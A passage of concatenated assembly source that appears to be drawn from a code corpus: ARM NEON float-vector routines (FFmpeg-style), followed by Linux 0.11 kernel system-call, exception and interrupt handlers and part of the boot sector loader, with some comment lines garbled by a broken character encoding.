2: vst1.32 {q2},[r0,:128]! @ drain pipelined stores
vst1.32 {q3},[r0,:128]!
ands len, len, #15 @ tail elements remaining?
it eq
bxeq lr
3: vld1.32 {q0},[r1,:128]! @ tail: 4 floats per iteration
vmul.f32 q0, q0, q8
vst1.32 {q0},[r0,:128]!
subs len, len, #4
bgt 3b
bx lr
.unreq len
endfunc
@ void ff_vector_fmul_window(float *dst, const float *src0,
@                            const float *src1, const float *win, int len)
@ Overlap-add windowing used by audio codecs: for i in [0,len)
@   dst[i]           = src0[i]*win[i] - src1[len-1-i]*win[2*len-1-i]
@   dst[2*len-1-i]   = src0[i]*win[2*len-1-i] + src1[len-1-i]*win[i]
@ r0 = dst, r1 = src0, r2 = src1, r3 = win, len on the stack.
@ len assumed a non-zero multiple of 4.
function ff_vector_fmul_window_neon, export=1
push {r4,r5,lr}
ldr lr, [sp, #12] @ lr = len (first stack argument)
sub r2, r2, #8
sub r5, lr, #2
add r2, r2, r5, lsl #2 @ r2 -> last 4 floats of src1 (read backwards)
add r4, r3, r5, lsl #3 @ r4 -> last 4 floats of win (read backwards)
add ip, r0, r5, lsl #3 @ ip -> last 4 floats of dst (written backwards)
mov r5, #-16 @ backwards stride for r2/r4/ip
vld1.32 {d0,d1}, [r1,:128]! @ q0 = src0, forwards
vld1.32 {d2,d3}, [r2,:128], r5 @ q1 = src1, backwards
vld1.32 {d4,d5}, [r3,:128]! @ q2 = win low half, forwards
vld1.32 {d6,d7}, [r4,:128], r5 @ q3 = win high half, backwards
1: subs lr, lr, #4
vmul.f32 d22, d0, d4 @ q11 = src0*win_lo (second-half terms)
vrev64.32 q3, q3 @ reverse element order of backwards loads
vmul.f32 d23, d1, d5
vrev64.32 q1, q1
vmul.f32 d20, d0, d7 @ q10 = src0*win_hi (first-half terms)
vmul.f32 d21, d1, d6
beq 2f
vmla.f32 d22, d3, d7 @ accumulate src1*win terms, overlapped
vld1.32 {d0,d1}, [r1,:128]! @ with the next iteration's loads
vmla.f32 d23, d2, d6
vld1.32 {d18,d19},[r2,:128], r5
vmls.f32 d20, d3, d4
vld1.32 {d24,d25},[r3,:128]!
vmls.f32 d21, d2, d5
vld1.32 {d6,d7}, [r4,:128], r5
vmov q1, q9
vrev64.32 q11, q11 @ put backwards results in memory order
vmov q2, q12
vswp d22, d23
vst1.32 {d20,d21},[r0,:128]! @ first half forwards
vst1.32 {d22,d23},[ip,:128], r5 @ second half backwards
b 1b
2: vmla.f32 d22, d3, d7 @ epilogue: finish the final 4 outputs
vmla.f32 d23, d2, d6
vmls.f32 d20, d3, d4
vmls.f32 d21, d2, d5
vrev64.32 q11, q11
vswp d22, d23
vst1.32 {d20,d21},[r0,:128]!
vst1.32 {d22,d23},[ip,:128], r5
pop {r4,r5,pc}
endfunc
@ void ff_vector_fmul_add(float *dst, const float *src0,
@                         const float *src1, const float *src2, int len)
@ dst[i] = src0[i]*src1[i] + src2[i].
@ r0 = dst, r1 = src0, r2 = src1, r3 = src2, len on the stack.
@ len assumed a non-zero multiple of 8; buffers 16-byte aligned.
function ff_vector_fmul_add_neon, export=1
ldr r12, [sp] @ r12 = len
vld1.32 {q0-q1}, [r1,:128]! @ prime the pipeline with 8 elements
vld1.32 {q8-q9}, [r2,:128]!
vld1.32 {q2-q3}, [r3,:128]!
vmul.f32 q10, q0, q8
vmul.f32 q11, q1, q9
1: vadd.f32 q12, q2, q10 @ add src2 to the products
vadd.f32 q13, q3, q11
pld [r1, #16] @ prefetch upcoming inputs
pld [r2, #16]
pld [r3, #16]
subs r12, r12, #8
beq 2f
vld1.32 {q0}, [r1,:128]! @ next 8 elements, overlapped with
vld1.32 {q8}, [r2,:128]! @ the store of the current ones
vmul.f32 q10, q0, q8
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [r2,:128]!
vmul.f32 q11, q1, q9
vld1.32 {q2-q3}, [r3,:128]!
vst1.32 {q12-q13},[r0,:128]!
b 1b
2: vst1.32 {q12-q13},[r0,:128]! @ store the final 8 results
bx lr
endfunc
@ void ff_vector_fmul_reverse(float *dst, const float *src0,
@                             const float *src1, int len)
@ dst[i] = src0[i] * src1[len-1-i].
@ r0 = dst, r1 = src0, r2 = src1, r3 = len.
@ len assumed a non-zero multiple of 8; buffers 16-byte aligned.
function ff_vector_fmul_reverse_neon, export=1
add r2, r2, r3, lsl #2 @ r2 -> one past the end of src1
sub r2, r2, #32 @ back up to the last 8 floats
mov r12, #-32 @ backwards stride
vld1.32 {q0-q1}, [r1,:128]!
vld1.32 {q2-q3}, [r2,:128], r12
1: pld [r1, #32]
vrev64.32 q3, q3 @ reverse src1 within each d register;
vmul.f32 d16, d0, d7 @ crossing d7/d6 etc. completes the
vmul.f32 d17, d1, d6 @ full 8-element reversal
pld [r2, #-32]
vrev64.32 q2, q2
vmul.f32 d18, d2, d5
vmul.f32 d19, d3, d4
subs r3, r3, #8
beq 2f
vld1.32 {q0-q1}, [r1,:128]!
vld1.32 {q2-q3}, [r2,:128], r12
vst1.32 {q8-q9}, [r0,:128]!
b 1b
2: vst1.32 {q8-q9}, [r0,:128]! @ store the final 8 products
bx lr
endfunc
@ void ff_butterflies_float(float *v1, float *v2, int len)
@ In-place butterflies: t = v1[i] - v2[i]; v1[i] += v2[i]; v2[i] = t.
@ r0 = v1, r1 = v2, r2 = len (assumed a non-zero multiple of 4;
@ buffers 16-byte aligned).
function ff_butterflies_float_neon, export=1
1: vld1.32 {q0},[r0,:128]
vld1.32 {q1},[r1,:128]
vsub.f32 q2, q0, q1 @ difference -> v2
vadd.f32 q1, q0, q1 @ sum -> v1
vst1.32 {q2},[r1,:128]!
vst1.32 {q1},[r0,:128]!
subs r2, r2, #4
bgt 1b
bx lr
endfunc
@ float ff_scalarproduct_float(const float *v1, const float *v2, int len)
@ Returns sum(v1[i]*v2[i]).  r0 = v1, r1 = v2, r2 = len (assumed a
@ non-zero multiple of 4; buffers 16-byte aligned).  Result is returned
@ in d0/s0; for soft-float it is also copied to r0.
function ff_scalarproduct_float_neon, export=1
vmov.f32 q2, #0.0 @ accumulator
1: vld1.32 {q0},[r0,:128]!
vld1.32 {q1},[r1,:128]!
vmla.f32 q2, q0, q1
subs r2, r2, #4
bgt 1b
vadd.f32 d0, d4, d5 @ horizontal reduction of the 4 lanes
vpadd.f32 d0, d0, d0
NOVFP vmov.32 r0, d0[0] @ soft-float return value
bx lr
endfunc
|
Akagi201/linux-0.11
| 8,583
|
kernel/system_call.s
|
/*
* linux/kernel/system_call.s
*
* (C) 1991 Linus Torvalds
*/
/*
* system_call.s contains the system-call low-level handling routines.
* This also contains the timer-interrupt handler, as some of the code is
* the same. The hd- and flopppy-interrupts are also here.
*
* NOTE: This code handles signal-recognition, which happens every time
* after a timer-interrupt and after each system call. Ordinary interrupts
* don't handle signal-recognition, as that would clutter them up totally
* unnecessarily.
*
* Stack layout in 'ret_from_system_call':
*
* 0(%esp) - %eax
* 4(%esp) - %ebx
* 8(%esp) - %ecx
* C(%esp) - %edx
* 10(%esp) - %fs
* 14(%esp) - %es
* 18(%esp) - %ds
* 1C(%esp) - %eip
* 20(%esp) - %cs
* 24(%esp) - %eflags
* 28(%esp) - %oldesp
* 2C(%esp) - %oldss
*/
/*
 * system_call.s contains the low-level system-call handling code, the
 * timer interrupt handler and the hard-disk and floppy interrupt
 * handlers.  Signal recognition is performed after every timer
 * interrupt and after each system call (see ret_from_sys_call); the
 * stack layout on return is documented in the comment above.
 */
# Constants used throughout this file.  The stray book-scan page-header
# line ("5.5 system_call.s") that sat between FS and ES has been removed:
# it is not a comment and would be a syntax error for the assembler.
SIG_CHLD = 17 # SIGCHLD signal number (child stopped/terminated)

# Offsets of the items saved on the kernel stack by the entry code
# (see the stack-layout comment at the top of the file).
EAX = 0x00
EBX = 0x04
ECX = 0x08
EDX = 0x0C
FS = 0x10
ES = 0x14
DS = 0x18
EIP = 0x1C
CS = 0x20
EFLAGS = 0x24
OLDESP = 0x28 # present only when the privilege level changed
OLDSS = 0x2C

# Offsets into the task_struct (must match include/linux/sched.h).
state = 0 # these are offsets into the task-struct.
counter = 4 # remaining time-slice ticks (decremented by the timer)
priority = 8 # counter is reloaded from priority when it reaches 0
signal = 12 # pending-signal bitmap; bit n = signal n+1
sigaction = 16 # MUST be 16 (=len of sigaction)
blocked = (33*16) # offset of the blocked-signal bitmap

# offsets within sigaction (see include/signal.h)
sa_handler = 0 # handler address
sa_mask = 4 # signal mask
sa_flags = 8 # flags
sa_restorer = 12 # user-space restorer trampoline address

nr_system_calls = 72 # number of system calls in this kernel
/*
* Ok, I get parallel printer interrupts while using the floppy for some
* strange reason. Urgel. Now I just ignore them.
*/
/*
* ˣʹʱյ˲дӡжϣ֡ǣڲ
*/
# ڵ㡣
.globl _system_call,_sys_fork,_timer_interrupt,_sys_execve
.globl _hd_interrupt,_floppy_interrupt,_parallel_interrupt
.globl _device_not_available, _coprocessor_error
# ϵͳúš
.align 2
# Bad system-call number: return -1 to the caller.
bad_sys_call:
	movl $-1,%eax
	iret

# Run the scheduler; schedule() returns through ret_from_sys_call so
# that pending signals are handled before going back to user mode.
.align 2
reschedule:
	pushl $ret_from_sys_call
	jmp _schedule

#### int 0x80 -- linux system-call entry point (%eax = call number).
# NOTE: two stray book-scan page-header lines ("5.5 system_call.s") that
# were embedded in the instruction stream have been removed; they are not
# comments and would not assemble.
.align 2
_system_call:
	cmpl $nr_system_calls-1,%eax	# number out of range -> eax = -1
	ja bad_sys_call
	push %ds			# save the caller's segment registers
	push %es
	push %fs
	pushl %edx			# ebx,ecx,edx carry the C arguments
	pushl %ecx			# push %ebx,%ecx,%edx as parameters
	pushl %ebx			# to the system call
	movl $0x10,%edx			# set up ds,es to kernel space
	mov %dx,%ds
	mov %dx,%es
	movl $0x17,%edx			# fs points to local (user) data space
	mov %dx,%fs
	call _sys_call_table(,%eax,4)	# sys_xxx(); table in include/linux/sys.h
	pushl %eax			# save the call's return value
	movl _current,%eax		# current task_struct pointer
	cmpl $0,state(%eax)		# not runnable any more? reschedule
	jne reschedule
	cmpl $0,counter(%eax)		# time slice used up? reschedule
	je reschedule
# Common return path for system calls and several interrupt handlers:
# deliver one pending, unblocked signal before returning to user mode.
ret_from_sys_call:
	movl _current,%eax		# task[0] cannot have signals
	cmpl _task,%eax
	je 3f
	cmpw $0x0f,CS(%esp)		# was old code segment supervisor ?
	jne 3f				# (only user-mode returns get signals)
	cmpw $0x17,OLDSS(%esp)		# was stack segment = 0x17 ?
	jne 3f
	movl signal(%eax),%ebx		# pending-signal bitmap
	movl blocked(%eax),%ecx		# blocked-signal bitmap
	notl %ecx
	andl %ebx,%ecx			# deliverable signals
	bsfl %ecx,%ecx			# find lowest set bit
	je 3f				# none: just restore and return
	btrl %ecx,%ebx			# clear it in the pending bitmap
	movl %ebx,signal(%eax)
	incl %ecx			# signal numbers start at 1
	pushl %ecx			# signr argument for do_signal
	call _do_signal			# kernel/signal.c
	popl %eax
3:	popl %eax			# restore registers and return
	popl %ebx
	popl %ecx
	popl %edx
	pop %fs
	pop %es
	pop %ds
	iret
#### int 16 -- coprocessor error.  Builds a system-call-style stack frame
# and jumps to the C handler math_error(); that handler returns through
# ret_from_sys_call so pending signals are processed.
.align 2
_coprocessor_error:
push %ds
push %es
push %fs
pushl %edx
pushl %ecx
pushl %ebx
pushl %eax
movl $0x10,%eax # ds,es -> kernel data segment
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs -> user (local) data segment
mov %ax,%fs
pushl $ret_from_sys_call # return address for math_error
jmp _math_error # kernel/math/math_emulate.c
#### int 7 -- device not available (coprocessor not available).
# Raised when the CPU executes an FPU instruction while CR0.TS is set
# (after a task switch) or while CR0.EM requests emulation.  If a real
# FPU exists (EM clear) its state is restored via math_state_restore();
# otherwise the instruction is emulated in C.  Either way control
# returns through ret_from_sys_call.
# NOTE: a stray book-scan page-header line ("5.5 system_call.s") that sat
# between `clts` and `movl %cr0,%eax` has been removed; it would not
# assemble.
.align 2
_device_not_available:
	push %ds
	push %es
	push %fs
	pushl %edx
	pushl %ecx
	pushl %ebx
	pushl %eax
	movl $0x10,%eax		# ds,es -> kernel data segment
	mov %ax,%ds
	mov %ax,%es
	movl $0x17,%eax		# fs -> user (local) data segment
	mov %ax,%fs
	pushl $ret_from_sys_call	# both paths return through here
	clts			# clear TS so that we can use math
	movl %cr0,%eax
	testl $0x4,%eax		# EM (math emulation bit)
	je _math_state_restore	# real FPU: restore its context (kernel/sched.c)
	pushl %ebp		# no FPU: emulate the instruction
	pushl %esi
	pushl %edi
	call _math_emulate	# kernel/math/math_emulate.c
	popl %edi
	popl %esi
	popl %ebp
	ret			# pops into ret_from_sys_call
#### int 32 -- (0x20) timer interrupt, programmed to 100 Hz in sched.c.
# Increments jiffies, acknowledges the 8259A, then calls do_timer(CPL)
# which handles accounting and task switching; returns through
# ret_from_sys_call so pending signals are delivered.
.align 2
_timer_interrupt:
push %ds # save ds,es and put kernel data space
push %es # into them. %fs is used by _system_call
push %fs
pushl %edx # we save %eax,%ecx,%edx as gcc doesn't
pushl %ecx # save those across function calls. %ebx
pushl %ebx # is saved as we use that in ret_sys_call
pushl %eax
movl $0x10,%eax # ds,es -> kernel data segment
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs -> user (local) data segment
mov %ax,%fs
incl _jiffies
# The 8259A was not initialized for auto-EOI, so acknowledge by hand.
movb $0x20,%al # EOI to interrupt controller #1
outb %al,$0x20 # OCW2 to port 0x20
# Pass the interrupted privilege level (from the saved CS) to do_timer.
movl CS(%esp),%eax
andl $3,%eax # %eax is CPL (0 or 3, 0=supervisor)
pushl %eax
call _do_timer # 'do_timer(long CPL)' does everything from
addl $4,%esp # task switching to accounting ...
jmp ret_from_sys_call
#### sys_execve() system call.  Passes the address of the saved user EIP
# slot on the stack to the C function do_execve() (fs/exec.c), which
# rewrites the saved context to start the new program.
.align 2
_sys_execve:
lea EIP(%esp),%eax # eax -> saved user eip on this stack
pushl %eax
call _do_execve
addl $4,%esp # discard the pushed argument
ret
# 5.5 system_call.s (book-scan page header, kept as a comment)
#### sys_fork() system call (entry 2 in sys_call_table).  First calls
# find_empty_process() to get a free pid/task slot; on failure (negative
# eax) returns immediately.  Otherwise pushes the extra context that
# copy_process() needs and calls it (kernel/fork.c).
.align 2
_sys_fork:
call _find_empty_process # returns new task nr in eax, <0 on failure
testl %eax,%eax
js 1f
push %gs
pushl %esi
pushl %edi
pushl %ebp
pushl %eax
call _copy_process # kernel/fork.c
addl $20,%esp # drop the five pushed arguments
1: ret
#### int 46 -- (0x2E) hard-disk interrupt, IRQ14 (on the slave 8259A).
# Raised when a disk operation completes (see kernel/blk_drv/hd.c).
# Fetches and clears the handler pointer do_hd (read_intr, write_intr);
# if it was NULL the interrupt was unexpected and
# unexpected_hd_interrupt() is called instead.  Both 8259A chips are
# acknowledged by hand.
# NOTE: a stray book-scan page-header line ("5.5 system_call.s") that sat
# among the register pops has been removed; it would not assemble.
_hd_interrupt:
	pushl %eax
	pushl %ecx
	pushl %edx
	push %ds
	push %es
	push %fs
	movl $0x10,%eax		# ds,es -> kernel data segment
	mov %ax,%ds
	mov %ax,%es
	movl $0x17,%eax		# fs -> user (local) data segment
	mov %ax,%fs
	movb $0x20,%al
	outb %al,$0xA0		# EOI to the slave 8259A (IRQ14 lives there)
	jmp 1f			# give port chance to breathe
1:	jmp 1f			# (short I/O delay)
1:	xorl %edx,%edx
	xchgl _do_hd,%edx	# atomically fetch and clear the handler
	testl %edx,%edx		# NULL means nobody expected this interrupt
	jne 1f
	movl $_unexpected_hd_interrupt,%edx	# kernel/blk_drv/hd.c
1:	outb %al,$0x20		# EOI to the master 8259A
	call *%edx		# "interesting" way of handling intr.
	pop %fs
	pop %es
	pop %ds
	popl %edx
	popl %ecx
	popl %eax
	iret
#### int 38 -- (0x26) floppy interrupt, IRQ6 (kernel/blk_drv/floppy.c).
# Sends EOI, then calls the handler currently installed in do_floppy
# (rw_interrupt, seek_interrupt, recal_interrupt or reset_interrupt);
# if none is installed, unexpected_floppy_interrupt() is called.
_floppy_interrupt:
pushl %eax
pushl %ecx
pushl %edx
push %ds
push %es
push %fs
movl $0x10,%eax # ds,es -> kernel data segment
mov %ax,%ds
mov %ax,%es
movl $0x17,%eax # fs -> user (local) data segment
mov %ax,%fs
movb $0x20,%al
outb %al,$0x20 # EOI to interrupt controller #1
xorl %eax,%eax
xchgl _do_floppy,%eax # atomically fetch and clear the handler
testl %eax,%eax # NULL means nobody expected this interrupt
jne 1f
movl $_unexpected_floppy_interrupt,%eax
1: call *%eax # "interesting" way of handling intr.
pop %fs
pop %es
pop %ds
popl %edx
popl %ecx
popl %eax
iret
#### int 39 -- (0x27) parallel-port interrupt, IRQ7.  Not implemented in
# this kernel version; just acknowledge the controller.
_parallel_interrupt:
pushl %eax
movb $0x20,%al
outb %al,$0x20 # EOI to interrupt controller #1
popl %eax
iret
|
Akagi201/linux-0.11
| 3,595
|
kernel/asm.s
|
/*
* linux/kernel/asm.s
*
* (C) 1991 Linus Torvalds
*/
/*
 * asm.s contains the low-level code for most hardware faults.
 * page_exception is handled by the mm, so that isn't here. This
 * file also handles (hopefully) fpu-exceptions due to TS-bit, as
 * the fpu must be properly saved/restored. This hasn't been tested.
 */
/*
 * (5.3 asm.s) Each entry below builds a common stack frame for a CPU
 * exception and dispatches to the matching C handler in traps.c.
 */
# ļҪ漰Intel жint0--int16 Ĵint17-int31 ʹã
# һЩȫֺԭtraps.c ˵
.globl _divide_error,_debug,_nmi,_int3,_overflow,_bounds,_invalid_op
.globl _double_fault,_coprocessor_segment_overrun
.globl _invalid_TSS,_segment_not_present,_stack_segment
.globl _general_protection,_coprocessor_error,_irq13,_reserved
# int 0 -- divide error.  Pushes the C handler address and falls into
# no_error_code, the shared entry path for exceptions that push no error
# code: it saves all registers, pushes a fake error code of 0 plus the
# address of the saved return-address slot, switches to kernel data
# segments and calls the handler (do_divide_error() in traps.c).
_divide_error:
pushl $_do_divide_error # C handler address; error code is 0
no_error_code: # shared no-error-code exception path
xchgl %eax,(%esp) # eax <- handler address; old eax saved on stack
pushl %ebx
pushl %ecx
pushl %edx
pushl %edi
pushl %esi
pushl %ebp
push %ds # segment registers still take 4 stack bytes each
push %es
push %fs
pushl $0 # "error code" # fake error code
lea 44(%esp),%edx # address of the saved return-address slot
pushl %edx
movl $0x10,%edx # kernel data segment selector
mov %dx,%ds
mov %dx,%es
mov %dx,%fs
call *%eax # invoke the do_xxx handler
addl $8,%esp # drop the two handler arguments
pop %fs
pop %es
pop %ds
popl %ebp
popl %esi
popl %edi
popl %edx
popl %ecx
popl %ebx
popl %eax # restore the original eax
iret
# int 1 -- debug trap entry point (no error code).
# NOTE: a stray book-scan page-header line ("5.3 asm.s") between the
# label and the push has been removed; it would not assemble.
# (Historical quirk preserved: this entry pushes _do_int3, sharing the
# breakpoint handler.)
_debug:
	pushl $_do_int3		# shared with int 3
	jmp no_error_code
# int 2 -- non-maskable interrupt.
_nmi:
pushl $_do_nmi
jmp no_error_code
# int 3 -- breakpoint.
_int3:
pushl $_do_int3
jmp no_error_code
# int 4 -- overflow (INTO).
_overflow:
pushl $_do_overflow
jmp no_error_code
# int 5 -- BOUND range exceeded.
_bounds:
pushl $_do_bounds
jmp no_error_code
# int 6 -- invalid opcode.
_invalid_op:
pushl $_do_invalid_op
jmp no_error_code
# int 9 -- coprocessor segment overrun (287/387-era fault).
_coprocessor_segment_overrun:
pushl $_do_coprocessor_segment_overrun
jmp no_error_code
# int 15 -- reserved.
_reserved:
pushl $_do_reserved
jmp no_error_code
# int 45 -- (0x20 + 13) math coprocessor interrupt.  The 80387 raises
# IRQ13 when it completes an operation, to notify the CPU.
_irq13:
pushl %eax
xorb %al,%al # writing port 0xF0 clears the latched
outb %al,$0xF0 # coprocessor BUSY signal to the CPU
movb $0x20,%al
outb %al,$0x20 # EOI to the master 8259A
jmp 1f # short jumps as an I/O delay
1: jmp 1f
1: outb %al,$0xA0 # EOI to the slave 8259A
popl %eax
jmp _coprocessor_error # continue in kernel/system_call.s
# (5.3 asm.s) _coprocessor_error was originally in this file but has
# been moved to kernel/system_call.s.  The entries below are for
# exceptions where the CPU pushes an error code after the return address.
# int 8 -- double fault.  Entry path for exceptions that DO push an error
# code: error_code builds the same frame as no_error_code but keeps the
# real error code the CPU pushed.
_double_fault:
pushl $_do_double_fault # C handler address
error_code: # shared with-error-code exception path
xchgl %eax,4(%esp) # error code <-> %eax; old eax saved on stack
xchgl %ebx,(%esp) # &function <-> %ebx; old ebx saved on stack
pushl %ecx
pushl %edx
pushl %edi
pushl %esi
pushl %ebp
push %ds
push %es
push %fs
pushl %eax # error code # real error code as argument
lea 44(%esp),%eax # offset # address of saved return-address slot
pushl %eax
movl $0x10,%eax # kernel data segment selector
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
call *%ebx # invoke the do_xxx handler
addl $8,%esp # drop the two handler arguments
pop %fs
pop %es
pop %ds
popl %ebp
popl %esi
popl %edi
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
# int 10 -- invalid TSS.
_invalid_TSS:
pushl $_do_invalid_TSS
jmp error_code
# int 11 -- segment not present.
_segment_not_present:
pushl $_do_segment_not_present
jmp error_code
# int 12 -- stack-segment fault.
_stack_segment:
pushl $_do_stack_segment
jmp error_code
# 5.3 asm.s (book-scan page header, kept as a comment)
# int 13 -- general protection fault.
_general_protection:
pushl $_do_general_protection
jmp error_code
# int7 -- 豸(_device_not_available)(kernel/system_call.s,148)
# int14 -- ҳ(_page_fault)(mm/page.s,14)
# int16 -- Э(_coprocessor_error)(kernel/system_call.s,131)
# ʱжint 0x20 (_timer_interrupt)(kernel/system_call.s,176)
# ϵͳint 0x80 (_system_call)ڣkernel/system_call.s,80
|
Akagi201/linux-0.11
| 8,087
|
boot/bootsect.s
|
!
! SYS_SIZE is the number of clicks (16 bytes) to be loaded.
! 0x3000 is 0x30000 bytes = 196kB, more than enough for current
! versions of linux ! SYS_SIZE ҪصĽ16 ֽΪ1 ڣ0x3000 Ϊ
! (memory-layout sketch from the original book scan, made into comments:)
!   0x00000           low memory
!   0x07c00           BIOS loads this boot sector here
!   0x10000           system module is read to here
!   0x90000           boot sector relocates itself here
!   0x90200           setup module is loaded here
!   0xA0000           top of usable low memory
! 0x3000 clicks = 0x30000 bytes = 192 kB, more than enough for current
! versions of linux.
SYSSIZE = 0x3000 ! size of the system module, in 16-byte clicks
! (a default; the build normally patches in the real value)
!
! bootsect.s (C) 1991 Linus Torvalds
!
! bootsect.s is loaded at 0x7c00 by the bios-startup routines, and moves
! iself out of the way to address 0x90000, and jumps there.
!
! It then loads 'setup' directly after itself (0x90200), and the system
! at 0x10000, using BIOS interrupts.
!
! NOTE! currently system is at most 8*65536 bytes long. This should be no
! problem, even in the future. I want to keep it simple. This 512 kB
! kernel size should be enough, especially as this doesn't contain the
! buffer cache as in minix
!
! The loader has been made as simple as possible, and continuos
! read errors will result in a unbreakable loop. Reboot by hand. It
! loads pretty fast by getting whole sectors at a time whenever possible.
!
! ǰЩֵķ룺
! bootsect.s (C) 1991 Linus Torvalds Ȩ
!
! bootsect.s bios-ӳ0x7c00 (31k)Լ
! Ƶ˵ַ0x90000 (576k)ת
!
! ȻʹBIOS жϽ'setup'ֱӼصԼĺ(0x90200)(576.5k)
! system صַ0x10000
!
! ע! ĿǰںϵͳΪ(8*65536)(512k)ֽڣʹ
! ҲӦûġּˡ512k ں˳Ӧ
! 㹻ˣûminix һٻ塣
!
! سѾĹˣԳĶѭֹֻ
! ֻҪܣͨһȡȡеع̿ĺܿġ
.globl begtext, begdata, begbss, endtext, enddata, endbss ! 6 ȫֱʶ
.text ! ıΣ
begtext:
.data ! ݶΣ
begdata:
.bss ! ջΣ
begbss:
.text ! ıΣ
SETUPLEN = 4 ! nr of setup-sectors
BOOTSEG = 0x07c0 ! original address of boot-sector
INITSEG = 0x9000 ! we move boot here - out of the way
SETUPSEG = 0x9020 ! setup starts here
SYSSEG = 0x1000 ! system loaded at 0x10000 (65536).
ENDSEG = SYSSEG + SYSSIZE ! where to stop loading
! ROOT_DEV is the device number of the root filesystem:
!   dev_no = (major << 8) + minor
! majors: 1-memory, 2-floppy, 3-hard disk, 4-ttyx, 5-tty, 6-lp, 7-pipe.
! 0x306 = first partition of the second hard disk.
! 0x000 would mean: same floppy type as the boot device;
! 0x301 = first partition on first drive, etc.
ROOT_DEV = 0x306
entry start			! tell the linker execution starts at 'start'
start:
! Copy ourselves (256 words = 512 bytes) from 0x07C0:0 to 0x9000:0 and
! continue execution in the relocated copy.
	mov ax,#BOOTSEG
	mov ds,ax
	mov ax,#INITSEG
	mov es,ax
	mov cx,#256		! 256 words to move
	sub si,si		! source      ds:si = 0x07C0:0x0000
	sub di,di		! destination es:di = 0x9000:0x0000
	rep			! repeat until cx = 0
	movw			! move one word at a time
	jmpi go,INITSEG		! far jump into the relocated copy
go:	mov ax,cs		! cs = INITSEG after the jump
	mov ds,ax		! ds,es,ss all point at the new segment
				! (fixes the scan artifact: this line's
				! comment had lost its '!' marker)
	mov es,ax
! put stack at 0x9ff00.
	mov ss,ax
	mov sp,#0xFF00		! arbitrary value >>512; must stay above
				! 0x200 + 0x200*SETUPLEN (code + setup)
! load the setup-sectors directly after the bootblock.
! Note that 'es' is already set up.
load_setup:
! BIOS INT 0x13, AH=2: read SETUPLEN sectors starting at track 0,
! sector 2 into 0x9000:0x0200, i.e. right behind this boot sector.
! On error, reset the drive (AH=0) and retry forever.
mov dx,#0x0000 ! drive 0, head 0
mov cx,#0x0002 ! sector 2, track 0
mov bx,#0x0200 ! address = 512, in INITSEG
mov ax,#0x0200+SETUPLEN ! service 2, nr of sectors
int 0x13 ! read it
jnc ok_load_setup ! ok - continue
mov dx,#0x0000
mov ax,#0x0000 ! reset the diskette
int 0x13
j load_setup ! retry
ok_load_setup:
! Get disk drive parameters, specifically nr of sectors/track
! (INT 0x13, AH=8: returns sectors-per-track in the low bits of cl).
mov dl,#0x00
mov ax,#0x0800 ! AH=8 is get drive parameters
int 0x13
mov ch,#0x00
seg cs ! next memory access is cs-relative
mov sectors,cx ! store sectors per track
mov ax,#INITSEG
mov es,ax ! restore es (clobbered by the AH=8 call)
! Print some inane message ("Loading system ..." with CR/LFs, 24 chars).
mov ah,#0x03 ! read cursor pos
xor bh,bh
int 0x10
mov cx,#24 ! 24 characters
mov bx,#0x0007 ! page 0, attribute 7 (normal)
mov bp,#msg1 ! es:bp -> string to display
mov ax,#0x1301 ! write string, move cursor
int 0x10
! ok, we've written the message, now
! we want to load the system (at 0x10000)
mov ax,#SYSSEG
mov es,ax ! segment of 0x010000
call read_it ! load the system module at es:0
call kill_motor ! switch the floppy motor off
! After that we check which root-device to use. If the device is
! defined (!= 0), nothing is done and the given device is used.
! Otherwise, either /dev/PS0 (2,28) or /dev/at0 (2,8), depending
! on the number of sectors that the BIOS reports currently:
! 15 sectors/track means a 1.2M drive, 18 means 1.44M.
seg cs
mov ax,root_dev
cmp ax,#0
jne root_defined
seg cs
mov bx,sectors
mov ax,#0x0208 ! /dev/ps0 - 1.2Mb
cmp bx,#15
je root_defined
mov ax,#0x021c ! /dev/PS0 - 1.44Mb
cmp bx,#18
je root_defined
undef_root: ! unknown geometry: hang here
jmp undef_root
root_defined:
seg cs
mov root_dev,ax ! store the chosen root device number
! after that (everyting loaded), we jump to
! the setup-routine loaded directly after
! the bootblock:
jmpi 0,SETUPSEG ! far jump to setup.s at 0x9020:0000
!!!! ˾ͽˡ!!!!
! ӳ
! This routine loads the system at address 0x10000, making sure
! no 64kB boundaries are crossed. We try to load it as fast as
! possible, loading whole tracks whenever we can.
!
! in: es - starting address segment (normally 0x1000)
!
! ӳϵͳģصڴַ0x10000 ȷûпԽ64KB ڴ߽硣ͼ
! ؽмأֻҪܣÿμŵݡ
! 룺es C ʼڴֵַͨ0x1000
sread: .word 1+SETUPLEN ! sectors read of current track
! ǰŵѶʼʱѾ1
! bootsect setup ռSETUPLEN
head: .word 0 ! current head !ǰͷš
track: .word 0 ! current track !ǰŵš
read_it:
! Ķֵλڴַ64KB ߽紦ѭbx Ĵڱʾǰ
! ݵĿʼλá
mov ax,es
test ax,#0x0fff
die: jne die ! es must be at 64kB boundary ! es ֵλ64KB ַ߽!
xor bx,bx ! bx is starting address within segment ! bx Ϊƫλá
rp_read:
! жǷѾȫݡȽϵǰǷϵͳĩĶ(#ENDSEG)Ǿ
! תok1_read Ŵݡ˳ӳء
mov ax,es
cmp ax,#ENDSEG ! have we loaded all yet? ! ǷѾȫݣ
jb ok1_read
ret
ok1_read:
! ֤ǰŵҪȡax ĴС
! ݵǰŵδȡԼֽڿʼƫλãȫȡЩδ
! ֽǷᳬ64KB γȵơᳬݴ˴ֽܶ(64KB C
! ƫλ)˴Ҫȡ
seg cs
mov ax,sectors ! ȡÿŵ
sub ax,sread ! ȥǰŵѶ
mov cx,ax ! cx = ax = ǰŵδ
shl cx,#9 ! cx = cx * 512 ֽڡ
add cx,bx ! cx = cx + ڵǰƫֵ(bx)
! = ˴ζڹֽ
jnc ok2_read ! ûг64KB ֽڣתok2_read ִС
je ok2_read
xor ax,ax ! ϴ˴νŵδʱᳬ64KB
sub ax,bx ! ʱֽܶ(64KB C ڶƫλ)ת
shr ax,#9 ! Ҫȡ
ok2_read:
call read_track
mov cx,ax ! cx = ôβѶȡ
add ax,sread ! ǰŵѾȡ
seg cs
cmp ax,sectors ! ǰŵϵĻδתok3_read
jne ok3_read
! ôŵһͷ(1 Ŵͷ)ϵݡѾɣȥһŵ
mov ax,#1
sub ax,head ! жϵǰͷš
jne ok4_read ! 0 ͷȥ1 ͷϵݡ
inc track ! ȥһŵ
ok4_read:
